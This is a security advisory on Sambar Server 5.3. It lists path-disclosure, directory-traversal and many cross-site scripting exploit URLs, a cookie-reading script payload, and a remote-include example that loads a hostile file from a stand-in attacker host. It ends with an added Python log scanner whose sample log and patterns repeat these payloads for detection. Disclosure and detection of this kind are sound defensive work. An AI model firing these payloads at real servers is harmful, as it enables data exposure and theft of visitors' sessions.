________________________________________________________________________

           Security Corporation Security Advisory [SCSA-012]

________________________________________________________________________

PROGRAM: Sambar Server
HOMEPAGE: http://www.sambar.com/
VULNERABLE VERSIONS: 5.3 and prior

________________________________________________________________________

DESCRIPTION
________________________________________________________________________

"Sambar Server is the new standard in high performance multi-functional
servers with features rivaling other commercial products selling
separately for several hundreds of dollars. It's Winsock2 compliant
Win32 integration functions on Windows 95, Windows 98, Windows NT,
Win2000, and XP as a service or as an application."

(direct quote from http://sambar.jalyn.net)


DETAILS & EXPLOITS
________________________________________________________________________

¤ Path Disclosure :

Sambar's default installation ships a testcgi.exe and an environ.pl in
the CGI bin directory. Both allow remote users to view information about
the operating system and the web server's directory layout, including
the absolute installation path shown in the output below. These issues
can be triggered by a remote user submitting a specially crafted HTTP
request.

- Exploits :

  http://[target]/cgi-bin/environ.pl
  http://[target]/cgi-bin/testcgi.exe

  Will produce the following output:

- environ.pl :
--------------

Sambar Server CGI Environment Variables

GATEWAY_INTERFACE: CGI/1.1
PATH_INFO:
PATH_TRANSLATED: C:/sambar53/cgi-bin/environ.pl
QUERY_STRING:
REMOTE_ADDR: 127.0.0.1
REMOTE_HOST:
REMOTE_USER:
REQUEST_METHOD: GET
DOCUMENT_NAME: environ.pl
DOCUMENT_URI: /cgi-bin/environ.pl
SCRIPT_NAME: /cgi-bin/environ.pl
SCRIPT_FILENAME: C:/sambar53/cgi-bin/environ.pl
SERVER_NAME: localhost
SERVER_PORT: 80
SERVER_PROTOCOL: HTTP/1.1
SERVER_SOFTWARE: SAMBAR
CONTENT_LENGTH: 0
CONTENT:

- testcgi.exe :
---------------

Test CGI ...
Version 1.00 [ build date 8-03-97 ]

QUERY_STRING
PATH_INFO
PATH_TRANSLATED C:/sambar53/cgi-bin/testcgi.exe
SCRIPT_NAME /cgi-bin/testcgi.exe
SCRIPT_FILENAME C:/sambar53/cgi-bin/testcgi.exe
DOCUMENT_ROOT C:/sambar53/docs/
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
REMOTE_ADDR 127.0.0.1
REMOTE_HOST
SERVER_NAME localhost
SERVER_PROTOCOL HTTP/1.1
SERVER_SOFTWARE SAMBAR
CONTENT_TYPE

----------------------------

¤ Directory Disclosure :

Other vulnerabilities were found in Sambar that allow an attacker to
reveal the contents of files and directories on the web server that
should not be exposed. They can be exploited simply by requesting a
specially crafted URL that calls the iecreate.stm or ieedit.stm
application with a '../' appended to the parameter.

- Exploits :

  http://[target]/sysuser/docmgr/iecreate.stm?template=../
  http://[target]/sysuser/docmgr/ieedit.stm?url=../

----------------------------

¤ Cross Site Scripting :

Many exploitable bugs were found in Sambar Server that cause script
execution on the client's computer when a crafted URL is followed. This
kind of attack, known as a "Cross-Site Scripting Vulnerability", is
present in many sections of the web site: an attacker can inject
specially crafted links and/or other malicious scripts through the
parameters listed below.

- Exploits :

  http://[target]/netutils/ipdata.stm?ipaddr=[hostile_code]
  http://[target]/netutils/whodata.stm?sitename=[hostile_code]
  http://[target]/netutils/findata.stm?user=[hostile_code]
  http://[target]/netutils/findata.stm?host=[hostile_code]
  http://[target]/isapi/testisa.dll?check1=[hostile_code]
  http://[target]/cgi-bin/environ.pl?param1=[hostile_code]
  http://[target]/samples/search.dll?query=[hostile_code]&logic=AND
  http://[target]/wwwping/index.stm?wwwsite=[hostile_code]
  http://[target]/syshelp/stmex.stm?foo=[hostile_code]&bar=456
  http://[target]/syshelp/stmex.stm?foo=123&bar=[hostile_code]
  http://[target]/syshelp/cscript/showfunc.stm?func=[hostile_code]
  http://[target]/syshelp/cscript/showfncs.stm?pkg=[hostile_code]
  http://[target]/syshelp/cscript/showfnc.stm?pkg=[hostile_code]
  http://[target]/sysuser/docmgr/ieedit.stm?path=[hostile_code]
  http://[target]/sysuser/docmgr/ieedit.stm?name=[hostile_code]
  http://[target]/sysuser/docmgr/edit.stm?path=[hostile_code]
  http://[target]/sysuser/docmgr/edit.stm?name=[hostile_code]
  http://[target]/sysuser/docmgr/iecreate.stm?path=[hostile_code]
  http://[target]/sysuser/docmgr/create.stm?path=[hostile_code]
  http://[target]/sysuser/docmgr/info.stm?path=[hostile_code]
  http://[target]/sysuser/docmgr/info.stm?name=[hostile_code]
  http://[target]/sysuser/docmgr/ftp.stm?path=[hostile_code]
  http://[target]/sysuser/docmgr/htaccess.stm?path=[hostile_code]
  http://[target]/sysuser/docmgr/mkdir.stm?path=[hostile_code]
  http://[target]/sysuser/docmgr/rename.stm?path=[hostile_code]
  http://[target]/sysuser/docmgr/rename.stm?name=[hostile_code]
  http://[target]/sysuser/docmgr/search.stm?path=[hostile_code]
  http://[target]/sysuser/docmgr/search.stm?query=[hostile_code]
  http://[target]/sysuser/docmgr/sendmail.stm?path=[hostile_code]
  http://[target]/sysuser/docmgr/sendmail.stm?name=[hostile_code]
  http://[target]/sysuser/docmgr/template.stm?path=[hostile_code]
  http://[target]/sysuser/docmgr/update.stm?path=[hostile_code]
  http://[target]/sysuser/docmgr/update.stm?name=[hostile_code]
  http://[target]/sysuser/docmgr/vccheckin.stm?path=[hostile_code]
  http://[target]/sysuser/docmgr/vccheckin.stm?name=[hostile_code]
  http://[target]/sysuser/docmgr/vccreate.stm?path=[hostile_code]
  http://[target]/sysuser/docmgr/vccreate.stm?name=[hostile_code]
  http://[target]/sysuser/docmgr/vchist.stm?path=[hostile_code]
  http://[target]/sysuser/docmgr/vchist.stm?name=[hostile_code]
  http://[target]/cgi-bin/testcgi.exe?[hostile_code]

- Another cross-site scripting issue can be exploited with a remote
  file that includes the hostile code, like this :

  http://[target]/sysuser/docmgr/ieedit.stm?url=http://[attacker]/hostile_file.htm

  The hostile code could be :

  [script]alert("Cookie="+document.cookie)[/script]

  (opens a window showing the visitor's cookie.)
  (replace [] by <>)


SOLUTIONS
________________________________________________________________________

No solution for the moment.


VENDOR STATUS
________________________________________________________________________

The vendor has reportedly been notified.


LINKS
________________________________________________________________________

- http://www.security-corp.org/index.php?ink=4-15-1
- French version : http://www.security-corporation.com/index.php?id=advisories&a=012-FR

------------------------------------------------------------------------
Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com
------------------------------------------------------------------------
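Added example, not part of the original advisory and not Sambar's or Security Corporation's code: with no vendor fix available, a defender's first option is to look for the request patterns above in the server's access log. The Python script below parses access-log lines in Common Log Format (an assumption; Sambar's own log layout is not given in the advisory) and tags each request that matches one of the advisory's issue classes: a hit on the two sample CGIs, a '../' in the iecreate.stm template or ieedit.stm url parameter, a remote URL passed to ieedit.stm?url=, and script markers in any query parameter (the advisory lists specific parameters; the script checks all of them, which is a deliberate generalization). The log lines, addresses and host names are constructed for the example.

```python
"""Offline detection of SCSA-012 request patterns in a web server access log."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoints and parameters named in the advisory.
SAMPLE_CGIS = {"/cgi-bin/environ.pl", "/cgi-bin/testcgi.exe"}
TRAVERSAL_PARAMS = {
    "/sysuser/docmgr/iecreate.stm": {"template"},
    "/sysuser/docmgr/ieedit.stm": {"url"},
}
REMOTE_INCLUDE_PARAMS = {"/sysuser/docmgr/ieedit.stm": {"url"}}

# Markers for the three classes. Values are checked after URL decoding,
# so %3Cscript%3E and %2e%2e%2f are caught as well.
SCRIPT_RE = re.compile(r"<\s*script|javascript:|on\w+\s*=", re.I)
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)

# Assumed log layout: Common Log Format (not Sambar's native format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log: four advisory patterns followed by two benign requests.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Mar/2003:12:00:01 +0100] "GET /cgi-bin/environ.pl HTTP/1.1" 200 812
127.0.0.1 - - [10/Mar/2003:12:00:02 +0100] "GET /sysuser/docmgr/iecreate.stm?template=../ HTTP/1.1" 200 2110
127.0.0.1 - - [10/Mar/2003:12:00:03 +0100] "GET /netutils/ipdata.stm?ipaddr=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 640
127.0.0.1 - - [10/Mar/2003:12:00:04 +0100] "GET /sysuser/docmgr/ieedit.stm?url=http://evil.example/hostile_file.htm HTTP/1.1" 200 1980
127.0.0.1 - - [10/Mar/2003:12:00:05 +0100] "GET /index.htm HTTP/1.1" 200 3021
127.0.0.1 - - [10/Mar/2003:12:00:06 +0100] "GET /sysuser/docmgr/edit.stm?path=docs/readme.txt HTTP/1.1" 200 1500
"""


def classify_request(target):
    """Return the list of advisory issue tags matching one request target (path + query)."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    findings = []

    def add(tag):
        if tag not in findings:
            findings.append(tag)

    if path in SAMPLE_CGIS:
        add("sample-cgi-info-leak")

    # parse_qsl decodes percent-encoding; keep_blank_values keeps
    # "testcgi.exe?<payload>" style queries, which arrive as a name with no value.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in TRAVERSAL_PARAMS.get(path, ()) and TRAVERSAL_RE.search(value):
            add("directory-traversal")
        if name in REMOTE_INCLUDE_PARAMS.get(path, ()) and SCHEME_RE.match(value):
            add("remote-file-include")
        if SCRIPT_RE.search(name) or SCRIPT_RE.search(value):
            add("reflected-xss")
    return findings


def scan_log(text):
    """Parse CLF lines and return a record for every request with at least one finding."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        findings = classify_request(m.group("target"))
        if findings:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "target": m.group("target"), "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["target"], ",".join(hit["findings"]))
```

Run it against a real log by replacing SAMPLE_LOG with the file contents. Because the sample CGIs and the docmgr, netutils and syshelp scripts are part of the default installation rather than of a deployed site, a hit on them from an external address is a strong signal; until a vendor fix exists, restricting or removing those default directories is the workaround most administrators would consider alongside this monitoring.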